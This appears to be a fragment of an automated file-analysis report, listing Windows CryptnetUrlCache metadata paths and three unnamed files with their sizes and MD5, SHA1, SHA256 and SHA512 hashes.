SHA5127b5821914028a6d602fd45ff698657ab026e2586720846b42b3d33b1ec04f5d01f375af4db8d9906768f7c06ad0aa3672764c2bf0d671cad53a5de5b03194268
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD521a417926896375d5ffd8858352d23a1
SHA18405eb9d4b35a52fea7292b6b834549051cee221
SHA2561759202876e232396176741a77cd44da5259c59a1922631e06dc7caff2fec05f
SHA512c1525a056574a93bcb58c9506840c8d55f2805e8cafc95463fc66f032b4719c990e19d5a43230d3f01c32d76805a14ad772c34f115fed24ad1312ffc9b421ac8
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD550fc10e086ab04e56745aa857b1f3a9b
SHA1474c1720cc1db49081dd575402d43539b294e7c5
SHA25677e4856094f02496d52469876ebefad8e22ee60976263d3b6d43dac0e8a36abe
SHA5121df5f99509edc5f7bc68e74dbb1500d8d42cd62b38d5503b5613eb9d95d38b86baa45d9aec21f55ceaa2952eb1121a730932cdb5515b9b859ea91117771ad47e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD56499999aacca25ecd2e9ac9fab2e7b65
SHA16a69e7ab6c6c49c273ef9e82d9c49780ee819c34
SHA256038c5d945043b66e0b707009bbccc4850d473f6ec724a3ada66fa60016557018
SHA512147b260b3dd8e87a7f996083e9b3187b5dea19d42fe2f04c4b1c177d214d046aaf5b565251e81aec3a4f95cf31ea5e31e79de9f2ffaca93fa4e35adcbe0fcdbf
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD58678fa84104f9a47d5344481e73c35e0
SHA14edc4eb87988bd096dc103417d9270cd68400f43
SHA2560cc9c463d72dc1774d9eef3565c4d2bef9e4348ab3addb34b3bc3c4e1c99ad2a
SHA51279cb856391fa2cf288fee62bcb8f441cc417c5ad7de3ed8639e5c9482584eb2f00001f25bcd1a44030005c35abcb4c7bef5ef4f8769de6ca0cd82d13a49121a7
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5979a57b529c0aa223af5b6b5b6f1b55d
SHA145400225ede20ebcc56abf1929defd79dc242168
SHA256e3df95f5ca0b9e455b76117abaf8128a9554e3a308f0ec15675cf4ed051e2ef8
SHA512789b148ace03403c097f8d8d8a32cd8870a6d93155c4c6c26cbf3447c19884b01d0e99e82dfa391594d23145f97266053c4adea944276ded066c5079fab5b965
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD52fff1294673259a7a8d4f66f87d7953d
SHA13495de84e6ebd97cba2c2b9ed1fd2be38764d48e
SHA256171a93f50ee97c2d699e70297c8586985994059cd0b57cafa2e1f68011caf856
SHA512598f43cb169f55a6e6480a24d3061cd328e44cff801d09fb5b3a265dda620f52f054a2f5f10b862df96aecefa9d6e8561dce064152522026c4a54ce6d8e53cae
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5b5892df9feb251eb29cbcfe78331b366
SHA1826dc68ae10fe5352abac93b3bd183ff8d62e4dd
SHA256a0949b1fd161f74a64c1e294c924a60937e6fc0b5619b3a56db08e752ecde5b0
SHA512654eb3a7ddc7a24df0b1f3bad7bb1afd16d15b2ccebb64c28919afea3bc2b5febd7b7e096e11b91b5dfcd37dbd8b67dc0ffe6aac3ff071b1d4f53932eb0b621e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD58707d4e0ce43628924c5cd57a02a488f
SHA1bd73ef300e8bb1209ee431c531eea927c3e9b51a
SHA256e77cdeb1052456d91c1d1cf4e9bdecfb848f025e187737a3c21313cd227e5781
SHA512fa41f6d8426b624b2e78090d14f5ddf7dd885575f99125eb29b02f0c512d661c37907c21df2d05c0dab9680745dc8100400bd5d685a10a8c7e841d92f320ab98
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD525762dcdda1edae7874881e8f68ee93b
SHA1f43a7bb01e2ec4b6417104634214f497f806bd52
SHA2565477c1fe45982812c94eccf06163631f2af1bfa23ba3f596da095db49dd4e268
SHA512c3cc4972b9d4a2ebc2542b8f13bfb5342fa47d1df684723d6f4db0ca03e3b23d0f6866a12745480ff7db784424412387f2796e9a003c1ed97142ef2d493b7f61
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5075ee4deefc4016f4b68bb18d7366084
SHA129dc56a06eaa62c9effc7010d6980930fc596443
SHA256b3475f506c29d6235f55d6559e5efdb83715bc6d8c0e2ddc48dca9bb4197fdbd
SHA512335b5dfa728f0819581a8bc171e444e2543d67457cb9b430fd6b4c906eae47b88ad062c031f4a87cd4ac1bfeaa027d2dfc2e7d98cee90fa0fbc9a1c0aed03d97
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD54452679463480190d4d0e9818d5e8306
SHA1f389877bcfd3385de7b3b6f7bcafaec13d86ab6c
SHA256a75bd8d76537fe16d240a2c2b78ee34d29f28f78dfff4f1e7f41c3d11a0d54dd
SHA51228d0fb7ef8e0ea4e91ae4bac4ad52b7a891caaa939e2dc47ddc8b5d663157c148d4b98efa14b1a663b5ebb6a32bcfb07b0cd0cd49e84a55893d4ad6a04ad9906
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD594acd3d70ac699256dadaf5e4aabd73c
SHA1b09c6393dff6c3c4c6c32511991189032ed2d902
SHA256c794d58d0d7b0841d7ca5db280cefbbfa86a5746d050406558d51e31006241f0
SHA512af4421ce18b01b35e750ac114e55fcdcff7910686a6bee182ed7c29a731cd0aa72f14f5637789a31f11582e97b0679465ec1cb2d38c04ebe0bc33d56ab72506e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5e7f76c1d9e18412a90736e2850282f2a
SHA11a481b49c9a881ee3920053623c8dbedf27fe99d
SHA256476171fecac9fa1a66c7016a16271597d7fdf0aefcaf6f4be8481a3eb724adca
SHA512059b20fbe427ad0f3eb48d3cf7bd8964d3a7c7885cecc3cea3f961c563dfe1691e3147d8a0aee7430dbc31de315968626176545735d75ca495d5ef595454eec3
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
171KB
MD59c0c641c06238516f27941aa1166d427
SHA164cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA2564276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06
-
Filesize
1KB
MD534055f5e74bf321be45df84baf44b99e
SHA110a09d9c2dbf6d80591653671684f26de7bfac2e
SHA256ade9b38a771663640ff5cd9657db5549e3ad1469c0c3448f4cd615d3c7bcc847
SHA51225f14fcaa232eb7c56203095b05897160077ee0bf6cfd3264a31dc16557620bbb86fa8d281a5cbaa7eb9eca352ac2c9e2bc34feb030a4c8b2ae4a8550127acac